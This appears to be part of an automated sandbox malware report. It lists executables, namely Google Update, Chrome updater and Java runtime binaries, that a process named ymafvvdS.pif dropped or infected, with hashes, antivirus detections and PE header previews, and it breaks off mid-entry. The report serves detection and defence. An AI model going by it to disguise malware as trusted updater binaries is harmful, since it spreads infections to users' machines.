                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1419264
                                                                                                                                                                                                                        Entropy (8bit):5.4666969436459825
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:BlnRklQ6fgJcEwixYsqjnhMgeiCl7G0nehbGZpbD:9oRfgJcEwCEDmg27RnWGj
                                                                                                                                                                                                                        MD5:4E3284A179E53D9E6D0119FC9EA43F8F
                                                                                                                                                                                                                        SHA1:D99A8F122B1EF58B35F6874D03324690A35A263E
                                                                                                                                                                                                                        SHA-256:8C2308E01341AB8B66F8A9A40ACD3DC3AAABCF1734A581154E9C7CDBD60521D4
                                                                                                                                                                                                                        SHA-512:D7A92B85B23A701E7D28EE8F715A1432A96A6611450938745A0C7AB7855D18F19DC1E82AB6C99E19A032A28CE48B7EA441580A9299FAB5AF1BEA3227CBA7A56A
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1522176
                                                                                                                                                                                                                        Entropy (8bit):5.496509486836508
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:SW25k8hb0Haw+xosqjnhMgeiCl7G0nehbGZpbD:SWyk8SHawmUDmg27RnWGj
                                                                                                                                                                                                                        MD5:E88EADF7D86CC06637243EDC6E3615CA
                                                                                                                                                                                                                        SHA1:73A4A4EA349947A5A698111934A66360B42AF945
                                                                                                                                                                                                                        SHA-256:3567AA9983C0967BDA1A18FCBF093300E033F154230175E64EE9A564114E0F5B
                                                                                                                                                                                                                        SHA-512:18B9A7E419CF1561D8357F795B91E249702E0BC3650BA3B4D5FE19A74595335257480CFD585289623BC06DE2564D9C2EA74674AD59EFEBE4949B2084AB4DEEE1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@.......................................... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                        Entropy (8bit):5.1639369669066975
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:UWP/aK2vB+TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:UKCKABAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:07F0208AA8F68AC1FA2E4CCE75DAD540
                                                                                                                                                                                                                        SHA1:A2230FC30FA097EFB8315B54F0A4A059CDF3D0AC
                                                                                                                                                                                                                        SHA-256:52A870A066DBBEF6944ADF038A0D04020543D9407A15FEBD5C4F8E1DDAB7CCAE
                                                                                                                                                                                                                        SHA-512:FCF819F40BCD75614B487879D40D5A86C9EAF429301F2907026E1A88F61D2DF5E64611BFE392E756D9B15C30C13F7CFA78F01966225AF445C15015DB677824E0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................|.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1228288
                                                                                                                                                                                                                        Entropy (8bit):5.162019452015766
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:XO7cCNWB+09JXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:ejNWBPDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:7CE1D0B4F64D184766C1722B6E5FD6AC
                                                                                                                                                                                                                        SHA1:8B28CC577AF3ABF87CE9F45DBEB77CEE3E9A8A00
                                                                                                                                                                                                                        SHA-256:89F4C6A0C8E34A3206E1262C26322AE0BB01AEE8432198D1440127C56C22578F
                                                                                                                                                                                                                        SHA-512:7B4307C76C2F4F18B21961B3A25DBAB267E92C225026E54BCAE4B983F00A0E69D7772C87FF0386D88CC6B0563AFB9BA0EDD1D8C1C24482B2D49E2A70C1356BDE
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................sa.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1302528
                                                                                                                                                                                                                        Entropy (8bit):5.238917207681283
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:jihRyhdsRrNsqjnhMgeiCl7G0nehbGZpbD:jihsoRxDmg27RnWGj
                                                                                                                                                                                                                        MD5:4FFD9D6F90EE6EEC72E4B44B1AD6530C
                                                                                                                                                                                                                        SHA1:57BE122E9F1624025AB97B127213F1BC00F3D2DC
                                                                                                                                                                                                                        SHA-256:AC0029CA41B365D8B43C195BBFCB5D9855A4CDBF02600663E9F116457E14DB85
                                                                                                                                                                                                                        SHA-512:4EB02DD3D81BA63F2574397C9E9B6029D5D5E349E0715F1E06524C5DC5A15BC4BE85372C3EC4884C79BA1DB93330F89E404DD1028AF2BE603CEB3CDFF71DAFDC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p......NW.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1342464
                                                                                                                                                                                                                        Entropy (8bit):5.3509963854210705
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:I1FDmRF+wpx/QafCsqjnhMgeiCl7G0nehbGZpbD:2mRF+wn/JfGDmg27RnWGj
                                                                                                                                                                                                                        MD5:F172D15708A0F26C2F5397316F96B8AD
                                                                                                                                                                                                                        SHA1:8B60BDDBEF974353D02C79C31DFD018C07EE9052
                                                                                                                                                                                                                        SHA-256:0B66ED1D6EFCF6B19FF32B82CF791A9E6150EB93004B1D7D68A5C139D79522B5
                                                                                                                                                                                                                        SHA-512:0D75657C0307182B50898B85DE503AD7B88CEC8EB2897F37E6D4F2C7970FB57FE60D7A6485B88D9930D0C1CEA1F71D881556FBD71BFC101123109D01C9CBF3BC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................T`...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1228288
                                                                                                                                                                                                                        Entropy (8bit):5.161976757557592
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:b2Ae621B+0YPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:aE21BPUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:E33605B65EE0C815163C5F327421BF80
                                                                                                                                                                                                                        SHA1:33BA6707E65A3529AE9F9342ACC0B34225207B08
                                                                                                                                                                                                                        SHA-256:B3B488A60E831A255A2CF9C4715BCFD00871D35BA885CA83F7B67FA4B2282CFF
                                                                                                                                                                                                                        SHA-512:13E3CDC9AB57FFC87BEB5269F77FE4517C0071271F288E87AAF0E18B4698EFE940FF6E7B21A9F5CF8A40100CDE04F19A554976EEAAE88D3FF77516CE2F48E545
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................uT.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2151936
                                                                                                                                                                                                                        Entropy (8bit):7.987634321390246
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:sZkVX3lfrFfR0BecCqKBs+4o8YhAjDmg27RnWGj:sqR1frZRpcTKX4dD527BWG
                                                                                                                                                                                                                        MD5:E666A6F317AD1140BAF49F854D6A2851
                                                                                                                                                                                                                        SHA1:6EDE93CC05EEE183090360BFA127DDF1989ECB3F
                                                                                                                                                                                                                        SHA-256:3E8A855E053D3D8B0983166CF667ADBE53DBEC83792062E7AA93E73D8E61B495
                                                                                                                                                                                                                        SHA-512:346EA4F00B071C6A049D7238D67DBD23A0E4E8BE11BE143EB45916754F2A752DBCE24ABC7F190C324F4F073BBE870B4F2FC6DD114596E0090928B5D3560A8A78
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!.....<. ... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2151936
                                                                                                                                                                                                                        Entropy (8bit):7.987634808018328
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:EZkVX3lfrFfR0BecCqKBs+4o8YhAjDmg27RnWGj:EqR1frZRpcTKX4dD527BWG
                                                                                                                                                                                                                        MD5:940C41EE1F74C74A35EF5AA1D5092FB4
                                                                                                                                                                                                                        SHA1:59107ECF6958E32C12CB68BE69F982E3BC67673F
                                                                                                                                                                                                                        SHA-256:C3B06AC4BBA3A0313A2E75A1A845F79E41B1D4C1F545874FC2FC2A6F04FD101D
                                                                                                                                                                                                                        SHA-512:C7E74A2A49F1BF89D315FEF911A69465BA51EDD6FFD3F737B24EBE8DA9FA99496AE77C82A7D821B235CA35602408BA6D1FBB2C33A56AEE7A59974A42587F1F65
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!.......!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1158144
                                                                                                                                                                                                                        Entropy (8bit):5.068076042217309
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:iAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:115BDA5A506086F1BEEE739C85432E4F
                                                                                                                                                                                                                        SHA1:622FBD25330255E8F0CB39E9F0DA395A1436B65B
                                                                                                                                                                                                                        SHA-256:973BA0BEC7D44DE34230BEB11E2CCE517119FCE51E65F2B668F6C000E3A996FC
                                                                                                                                                                                                                        SHA-512:E5C2C5DA4B48AE635A7854DD1B62E11DAFDE29EFAA40D6BF87DE6A058747BC2DBBF63728C607761AC225664738499A00BFD2952C2112B04456FAB682F59A3AEC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................^.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032402776408183
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:pKzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:czsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:D4C4349403180A88DEAB5B72CC609450
                                                                                                                                                                                                                        SHA1:0CBCF26D312F11B96E378BA55710094ECE04CEAD
                                                                                                                                                                                                                        SHA-256:7521A80A3EA91EFAAF0B6A6E887EAD893C3383725742F607787F59D38BFE0ED0
                                                                                                                                                                                                                        SHA-512:5A971CA0F8B3D93D9FF240F034FA8245B1DED01BBC31D96A427344B7C23C143AB4FA0278DE45D53109ED656706C60AE2FEF42996312066C6702001344DC010FB
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                        Entropy (8bit):5.446050733245264
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:qnEbH0j4x7R6SvyCMaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:qkwOtO7asqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:5E9EA3B41AD5A813D84B471C8F0AE340
                                                                                                                                                                                                                        SHA1:6458DE7D26B0EA0A91C988CB54C1CF6E96074BB0
                                                                                                                                                                                                                        SHA-256:AE2D0E60D243E6BFF3FC479395B6D3B5678387B313DD4B3EF270719A4B8CED43
                                                                                                                                                                                                                        SHA-512:12A8E8677F4BAEDE1D21DE18B8DB701852D28143AC3D78510F8D3363FD93C1B8A926741AA8C9B1F00F4B79643D6B35B9F6A665D1F7C55D998B48C46C7B21AD0D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......r{.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1212416
                                                                                                                                                                                                                        Entropy (8bit):5.119726222919098
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:yv1vv3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:O1XsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:B05EE43934CE97A7F41B1C2F616B6A60
                                                                                                                                                                                                                        SHA1:7001A649A1799F77EB8211F8F33853FB2911E678
                                                                                                                                                                                                                        SHA-256:0A735675BDC43BCAA821155563D816D57BB6F410A7197E962F3E8E1A38D31EEF
                                                                                                                                                                                                                        SHA-512:CB38AFB7EA725881A1CE4408E7DBC849E4BEC33A63A5CD92AE607E96CF7EC65531B52829C09ED91D11F1B9CB17499E6E50AA3B13C50D9F8C530E811F4D1951BD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.................................?6......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                        Entropy (8bit):5.446803554950029
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:8nU/h/4KZsqjnhMgeiCl7G0nehbGZpbD:8U/VdDmg27RnWGj
                                                                                                                                                                                                                        MD5:325D341BAE4D0FE843169CCB026BAA85
                                                                                                                                                                                                                        SHA1:2038FE246B68318CD7AF72693F9F48DDE241B125
                                                                                                                                                                                                                        SHA-256:0373A46F4DC16F3E9357A6EB5A2DEB9B79AC577BDAE0D81EB76F9AB13B614394
                                                                                                                                                                                                                        SHA-512:8C95967D4FEF86811E80D42AA2EF3B6660850369D5DC036F27B41586924CD2A0D09CA8EFA1D9BD966B3D89F373FF99791B61EE6DB950CA555B8455A031907619
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......D\.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                                                                                        Entropy (8bit):5.483714593158854
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:Tx71iBLZ05jNTmJWExGsqjnhMgeiCl7G0nehbGZpbD:TxhiHIjNgKDmg27RnWGj
                                                                                                                                                                                                                        MD5:27E1562AD949CC8CCA05F96EAE7A8E3E
                                                                                                                                                                                                                        SHA1:7BC3559EBFC2677E4E4404FE2DE23E236B2166BB
                                                                                                                                                                                                                        SHA-256:54005CF8AC48F61B94F5F6EEEA31AB956543C8E99AFDE2F7B81F5546EFC30FE7
                                                                                                                                                                                                                        SHA-512:0FCDFFFA10C7B82C9045CA2E6E2FB820D051112145CBCE5DA30AE11E482E357E00EFFE67B49840AE4DEA672DD09FD9B8C0D0994EEE090C75BB5FBBC9F5824142
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................1T..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
